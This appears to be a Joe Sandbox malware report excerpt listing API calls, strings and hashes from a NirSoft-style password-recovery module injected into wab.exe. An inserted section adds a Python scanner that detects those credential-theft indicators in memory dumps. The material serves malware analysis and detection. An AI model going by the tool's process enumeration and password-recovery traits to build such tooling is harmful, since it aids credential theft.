                    • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                    • memset.MSVCRT ref: 0040DA23
                    • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                    • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                    • DestroyWindow.USER32(00000005), ref: 0040DA70
                      • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                    • String ID: caption
                    • API String ID: 973020956-4135340389
                    • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                    • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                    • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                    • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                    APIs
                    Strings
                    • <table dir="rtl"><tr><td>, xrefs: 00410B00
                    • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                    • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                    • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$_snwprintf$wcscpy
                    • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                    • API String ID: 1283228442-2366825230
                    • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                    • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                    • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                    • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                    APIs
                    • wcschr.MSVCRT ref: 00413972
                    • wcscpy.MSVCRT ref: 00413982
                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                      • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                    • wcscpy.MSVCRT ref: 004139D1
                    • wcscat.MSVCRT ref: 004139DC
                    • memset.MSVCRT ref: 004139B8
                      • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                      • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                    • memset.MSVCRT ref: 00413A00
                    • memcpy.MSVCRT ref: 00413A1B
                    • wcscat.MSVCRT ref: 00413A27
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                    • String ID: \systemroot
                    • API String ID: 4173585201-1821301763
                    • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                    • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                    • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                    • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: wcscpy
                    • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                    • API String ID: 1284135714-318151290
                    • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                    • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                    • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                    • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                    • String ID: 0$6
                    • API String ID: 4066108131-3849865405
                    • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                    • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                    • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                    • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                    APIs
                    • memset.MSVCRT ref: 004082EF
                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                    • memset.MSVCRT ref: 00408362
                    • memset.MSVCRT ref: 00408377
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$ByteCharMultiWide
                    • String ID:
                    • API String ID: 290601579-0
                    • Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                    • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                    • Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                    • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$memchrmemset
                    • String ID: PD$PD
                    • API String ID: 1581201632-2312785699
                    • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                    • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                    • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                    • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                    APIs
                    • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                    • GetSystemMetrics.USER32(00000010), ref: 00409F61
                    • GetDC.USER32(00000000), ref: 00409F6E
                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                    • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                    • GetWindowRect.USER32(?,?), ref: 00409FA0
                    • GetParent.USER32(?), ref: 00409FA5
                    • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                    • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                    • String ID:
                    • API String ID: 2163313125-0
                    • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                    • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                    • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                    • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@$wcslen
                    • String ID:
                    • API String ID: 239872665-3916222277
                    • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                    • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                    • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                    • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpywcslen$_snwprintfmemset
                    • String ID: %s (%s)$YV@
                    • API String ID: 3979103747-598926743
                    • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                    • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                    • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                    • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                    APIs
                    • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                    • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                    • wcslen.MSVCRT ref: 0040A6B1
                    • wcscpy.MSVCRT ref: 0040A6C1
                    • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                    • wcscpy.MSVCRT ref: 0040A6DB
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                    • String ID: Unknown Error$netmsg.dll
                    • API String ID: 2767993716-572158859
                    • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                    • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                    • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                    • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                    APIs
                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                    • wcscpy.MSVCRT ref: 0040DAFB
                    • wcscpy.MSVCRT ref: 0040DB0B
                    • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                      • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: PrivateProfilewcscpy$AttributesFileString
                    • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                    • API String ID: 3176057301-2039793938
                    • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                    • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                    • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                    • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                    APIs
                    Strings
                    • cannot ATTACH database within transaction, xrefs: 0042F663
                    • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                    • database %s is already in use, xrefs: 0042F6C5
                    • unable to open database: %s, xrefs: 0042F84E
                    • database is already attached, xrefs: 0042F721
                    • out of memory, xrefs: 0042F865
                    • too many attached databases - max %d, xrefs: 0042F64D
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpymemset
                    • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                    • API String ID: 1297977491-2001300268
                    • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                    • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                    • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                    • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
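The records above describe several string features of the module dumped from wab.exe (snapshot hcaresult_14_2_400000_wab.jbxd) that together point at a NirSoft password-recovery tool rather than generic code: the output-format switches compared with _wcsicmp (/scomma, /shtml, /skeepass, ...), the HTML report template referencing nirsoft.net, the runtime resolution of psapi.dll and Toolhelp32 exports through GetProcAddress, and the statically linked SQLite (the ATTACH error strings). The following is an added example, not part of the Joe Sandbox report or of the analysed sample: a small Python scanner that looks for those indicator groups in a memory dump and requires more than one group before calling it. It searches every indicator in both ASCII and UTF-16LE because the report shows the export names are passed narrow to GetProcAddress while the switches, DLL names and HTML template are handled by wide-string routines. The dump bytes are constructed inline for illustration; the group names and the two-group threshold are this example's own choices.

```python
"""
Added example (not from the Joe Sandbox report or the sample): scan a memory
dump for the string indicators the report attributes to the NirSoft
password-recovery module injected into wab.exe.  Indicators come from the
report's String ID fields; the dump buffers below are constructed test data.
"""
import re
from collections import defaultdict

# Indicator groups taken from the report.  GetProcAddress takes ANSI names,
# so export names are narrow in memory; the switches, DLL names and HTML
# template go through _wcsicmp/_snwprintf/LoadLibraryW and are UTF-16LE.
# Both encodings are tried for every indicator and the match is recorded.
INDICATORS = {
    "nirsoft_cli_switches": ["/scomma", "/shtml", "/skeepass", "/stab",
                             "/stabular", "/sverhtml", "/sxml"],
    # substring of the report's '<br><h4>%s <a href=...>%s</a></h4><p>' string
    "nirsoft_html_report": ['<a href="http://www.nirsoft.net/" target="newwin">',
                            '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">'],
    "dynamic_psapi_resolution": ["psapi.dll", "EnumProcesses", "EnumProcessModules",
                                 "GetModuleFileNameExW", "GetModuleBaseNameW",
                                 "GetModuleInformation"],
    "dynamic_toolhelp_resolution": ["CreateToolhelp32Snapshot", "Process32First",
                                    "Process32Next", "Module32First", "Module32Next"],
    # weak on its own: any program embedding SQLite carries these
    "embedded_sqlite": ["cannot ATTACH database within transaction",
                        "too many attached databases - max %d"],
}


def _encodings(s):
    yield "ascii", s.encode("ascii")
    yield "utf-16le", s.encode("utf-16le")


def scan(buf):
    """Return {group: [(indicator, encoding, offset), ...]} for every hit.
    Note that "/stab" also fires inside "/stabular"; offsets tell them apart."""
    hits = defaultdict(list)
    for group, needles in INDICATORS.items():
        for needle in needles:
            for enc, raw in _encodings(needle):
                for m in re.finditer(re.escape(raw), buf):
                    hits[group].append((needle, enc, m.start()))
    return dict(hits)


def classify(hits, min_groups=2):
    """Verdict plus the groups that fired.  A single group (e.g. the psapi
    export names) is common in benign software, so demand several."""
    matched = sorted(g for g, h in hits.items() if h)
    verdict = "nirsoft_password_recovery" if len(matched) >= min_groups else "inconclusive"
    return verdict, matched


def _wide(s):
    return s.encode("utf-16le") + b"\x00\x00"


def _narrow(s):
    return s.encode("ascii") + b"\x00"


def build_sample_dump():
    """Constructed stand-in for a dumped region; contains no real sample bytes."""
    return (b"\x90" * 64
            + _wide("/scomma") + _wide("/shtml") + _wide("/skeepass")
            + b"\xcc" * 32
            + _narrow("EnumProcesses") + _narrow("GetModuleFileNameExW")
            + _wide("psapi.dll")
            + b"\x00" * 16
            + _narrow("CreateToolhelp32Snapshot") + _narrow("Process32Next")
            + _wide('<a href="http://www.nirsoft.net/" target="newwin">')
            + _narrow("cannot ATTACH database within transaction")
            + b"\x00" * 64)


def build_benign_dump():
    """Constructed region that only enumerates processes, as much benign code does."""
    return b"\x00" * 32 + _narrow("EnumProcesses") + _narrow("GetModuleBaseNameW") + b"\x00" * 32


if __name__ == "__main__":
    for name, dump in (("sample", build_sample_dump()), ("benign", build_benign_dump())):
        hits = scan(dump)
        verdict, groups = classify(hits)
        print(f"{name}: {verdict} via {groups}")
        for group, found in hits.items():
            for needle, enc, off in found:
                print(f"  {group:28s} {enc:8s} 0x{off:06x} {needle!r}")
```

Run it against a real region by replacing build_sample_dump() with the bytes of the dumped module; encoding in the output tells you whether a hit is an import name (ASCII) or a wide string used at runtime, which is the distinction the report's API String IDs encode.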
                    APIs
                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                    • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                    • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                    • memcpy.MSVCRT ref: 0040EB80
                    • memcpy.MSVCRT ref: 0040EB94
                    • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                    • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                    • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                      • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                    • String ID: ($d
                    • API String ID: 1140211610-1915259565
                    APIs
                    • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                    • Sleep.KERNEL32(00000001), ref: 004178E9
                    • GetLastError.KERNEL32 ref: 004178FB
                    • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: File$ErrorLastLockSleepUnlock
                    • String ID:
                    • API String ID: 3015003838-0
                    APIs
                    • memset.MSVCRT ref: 00407E44
                    • memset.MSVCRT ref: 00407E5B
                    • _mbscpy.MSVCRT ref: 00407E7E
                    • _mbscpy.MSVCRT ref: 00407ED7
                    • _mbscpy.MSVCRT ref: 00407EEE
                    • _mbscpy.MSVCRT ref: 00407F01
                    • wcscpy.MSVCRT ref: 00407F10
                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                    • String ID:
                    • API String ID: 59245283-0
                    APIs
                    • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                    • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                    • GetLastError.KERNEL32 ref: 0041855C
                    • Sleep.KERNEL32(00000064), ref: 00418571
                    • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                    • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                    • GetLastError.KERNEL32 ref: 0041858E
                    • Sleep.KERNEL32(00000064), ref: 004185A3
                    • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: File$AttributesDeleteErrorLastSleep$??3@
                    • String ID:
                    • API String ID: 3467550082-0
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy
                    • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                    • API String ID: 3510742995-3273207271
                    APIs
                    • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                    • memset.MSVCRT ref: 00413ADC
                    • memset.MSVCRT ref: 00413AEC
                      • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                    • memset.MSVCRT ref: 00413BD7
                    • wcscpy.MSVCRT ref: 00413BF8
                    • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$wcscpy$CloseHandleOpenProcess
                    • String ID: 3A
                    • API String ID: 3300951397-293699754
                    APIs
                    • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                    • wcscpy.MSVCRT ref: 0040D1B5
                      • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                      • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                    • wcslen.MSVCRT ref: 0040D1D3
                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                    • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                    • memcpy.MSVCRT ref: 0040D24C
                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                    • String ID: strings
                    • API String ID: 3166385802-3030018805
                    APIs
                    • memset.MSVCRT ref: 00411AF6
                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                    • wcsrchr.MSVCRT ref: 00411B14
                    • wcscat.MSVCRT ref: 00411B2E
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: FileModuleNamememsetwcscatwcsrchr
                    • String ID: AE$.cfg$General$EA
                    • API String ID: 776488737-1622828088
                    APIs
                    • memset.MSVCRT ref: 0040D8BD
                    • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                    • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                    • memset.MSVCRT ref: 0040D906
                    • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                    • _wcsicmp.MSVCRT ref: 0040D92F
                      • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                      • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                    • String ID: sysdatetimepick32
                    • API String ID: 1028950076-4169760276
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$memset
                    • String ID: -journal$-wal
                    • API String ID: 438689982-2894717839
                    APIs
                    • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                    • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                    • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                    • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                    • EndDialog.USER32(?,00000002), ref: 00405C83
                    • EndDialog.USER32(?,00000001), ref: 00405C98
                      • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                      • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                    • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                    • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: Item$Dialog$MessageSend
                    • String ID:
                    • API String ID: 3975816621-0
                    APIs
